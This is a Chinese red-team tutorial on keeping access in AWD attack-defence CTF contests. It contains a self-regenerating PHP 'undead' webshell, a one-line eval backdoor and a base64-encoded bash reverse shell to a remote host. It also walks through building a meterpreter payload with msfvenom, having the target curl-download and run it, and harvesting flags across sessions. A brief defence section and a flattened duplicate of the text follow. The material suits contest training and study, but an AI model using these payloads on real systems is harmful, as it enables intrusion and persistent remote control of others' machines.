从红队视角看AWD攻击
字数 1333 2025-08-11 21:26:31

AWD攻防中的权限维持技术详解

1. AWD模式概述

AWD(Attack With Defense)是一种综合考核参赛团队攻击、防御技术能力的比赛模式:

  • 参赛队伍防守相同配置的虚拟靶机
  • 在有限时间内寻找其他战队的薄弱环节进行攻击
  • 同时需要加固自己的靶机环境

2. 传统权限维持方法:不死马

2.1 不死马原理与实现

<?php
set_time_limit(0); // 设置脚本执行时间为无限长
ignore_user_abort(1); // 忽略用户断开连接,脚本继续运行
unlink(__FILE__); // 删除自身
while(1){
    file_put_contents('./shell.php','<?php @eval($_GET[cmd]);?>'); // 创建shell.php
    sleep(0); // 间隔时间
}
?>

工作机制

  • 持续生成Webshell文件
  • 即使被删除也会自动重建
  • 删除自身以隐藏痕迹

2.2 不死马的缺陷

  1. 易被防御

    • 防守方可创建同名文件夹终止不死马:rm -rf shell.php && mkdir shell.php

  2. 日志暴露风险

    • 若防守方安装日志记录,可能获取shell地址和密码
    • 对方可反向利用该shell攻击其他机器("上车")

3. 红队权限维持技术

3.1 权限维持的定义

在红蓝对抗中,权限维持指攻击方在获得有限访问权限后,继续保持这些权限的过程,确保后续攻击行动能持续使用这些权限。

3.2 专业工具选择

推荐使用专业后渗透工具:

  • Metasploit:兼容Windows和Linux,适合AWD(通常使用Linux环境)
  • Cobalt Strike:企业级红队工具

优势:

  • 提供进程迁移、提权等功能
  • 隐蔽性强,不易被发现
  • 即使站点文件被删除,进程依然存在

4. Metasploit实战演示

4.1 环境准备

使用Docker测试环境:

docker build -t test/awd:v1.0 .

预设后门:http://localhost:8000/?springbird=phpinfo();

4.2 获取主机权限

  1. 利用一句话后门

    <?php echo "hi!This is SpringBird"; @eval($_REQUEST['springbird']);?>

  2. 反弹shell

    • 攻击机监听:nc -lvp 1256
    • 执行反弹: 
      bash -c '{echo,L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMjMuMTIzLjEyMy4xMjMvMTI1NiAwPiYx}|{base64,-d}|{bash,-i}'

4.3 创建Metasploit后门

  1. 生成Linux后门

    msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=你的IP LPORT=8887 -f elf > mshell.elf

  2. 启动HTTP服务供下载

    python2 -m SimpleHTTPServer

  3. 设置监听

    use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 123.123.123.123
set LPORT 8887
run

  4. 目标机下载执行

    curl -O http://123.123.123.123:8000/mshell.elf && chmod +x ./mshell.elf && ./mshell.elf&

4.4 批量操作与维持

  1. 批量获取flag

    sessions -c "cat /home/flag"

  2. 持久性优势

    • 即使删除Webshell,meterpreter会话依然存在
    • 其他攻击方因站点不存在无法攻击时,你仍可得分

5. 技术对比与选择建议

技术 隐蔽性 稳定性 易用性 适合场景
不死马 快速部署,短期对抗
Metasploit 专业比赛,长期维持

推荐策略

  • 初期使用简单Webshell快速得分
  • 稳定后部署Metasploit等专业工具维持权限
  • 多种技术结合使用,互为备份

6. 防御建议(蓝队视角)

  1. 检测不死马

    • 监控频繁创建的文件
    • 创建同名文件夹防御

  2. 对抗Metasploit

    • 监控异常网络连接
    • 检查可疑进程
    • 使用EDR类防护工具

  3. 通用防御

    • 完善日志记录
    • 定期检查系统完整性
    • 最小权限原则

7. 总结

在AWD比赛中,有效的权限维持技术是得分的关键:

  • 传统不死马简单但易被防御
  • Metasploit等专业工具提供更稳定的权限维持
  • 多种技术结合使用效果最佳
  • 即使删除表面Webshell,底层会话仍可保持

掌握这些技术可帮助团队在AWD比赛中建立优势,拉开比分差距。

AWD攻防中的权限维持技术详解 1. AWD模式概述 AWD(Attack With Defense)是一种综合考核参赛团队攻击、防御技术能力的比赛模式: 参赛队伍防守相同配置的虚拟靶机 在有限时间内寻找其他战队的薄弱环节进行攻击 同时需要加固自己的靶机环境 2. 传统权限维持方法:不死马 2.1 不死马原理与实现 工作机制 : 持续生成Webshell文件 即使被删除也会自动重建 删除自身以隐藏痕迹 2.2 不死马的缺陷 易被防御 : 防守方可创建同名文件夹终止不死马: rm -rf shell.php && mkdir shell.php 日志暴露风险 : 若防守方安装日志记录,可能获取shell地址和密码 对方可反向利用该shell攻击其他机器("上车") 3. 红队权限维持技术 3.1 权限维持的定义 在红蓝对抗中,权限维持指攻击方在获得有限访问权限后,继续保持这些权限的过程,确保后续攻击行动能持续使用这些权限。 3.2 专业工具选择 推荐使用专业后渗透工具: Metasploit :兼容Windows和Linux,适合AWD(通常使用Linux环境) Cobalt Strike :企业级红队工具 优势: 提供进程迁移、提权等功能 隐蔽性强,不易被发现 即使站点文件被删除,进程依然存在 4. Metasploit实战演示 4.1 环境准备 使用Docker测试环境: 预设后门: http://localhost:8000/?springbird=phpinfo(); 4.2 获取主机权限 利用一句话后门 : 反弹shell : 攻击机监听: nc -lvp 1256 执行反弹: 4.3 创建Metasploit后门 生成Linux后门 : 启动HTTP服务供下载 : 设置监听 : 目标机下载执行 : 4.4 批量操作与维持 批量获取flag : 持久性优势 : 即使删除Webshell,meterpreter会话依然存在 其他攻击方因站点不存在无法攻击时,你仍可得分 5. 技术对比与选择建议 | 技术 | 隐蔽性 | 稳定性 | 易用性 | 适合场景 | |------|--------|--------|--------|----------| | 不死马 | 低 | 中 | 高 | 快速部署,短期对抗 | | Metasploit | 高 | 高 | 中 | 专业比赛,长期维持 | 推荐策略 : 初期使用简单Webshell快速得分 稳定后部署Metasploit等专业工具维持权限 多种技术结合使用,互为备份 6. 防御建议(蓝队视角) 检测不死马 : 监控频繁创建的文件 创建同名文件夹防御 对抗Metasploit : 监控异常网络连接 检查可疑进程 使用EDR类防护工具 通用防御 : 完善日志记录 定期检查系统完整性 最小权限原则 7. 总结 在AWD比赛中,有效的权限维持技术是得分的关键: 传统不死马简单但易被防御 Metasploit等专业工具提供更稳定的权限维持 多种技术结合使用效果最佳 即使删除表面Webshell,底层会话仍可保持 掌握这些技术可帮助团队在AWD比赛中建立优势,拉开比分差距。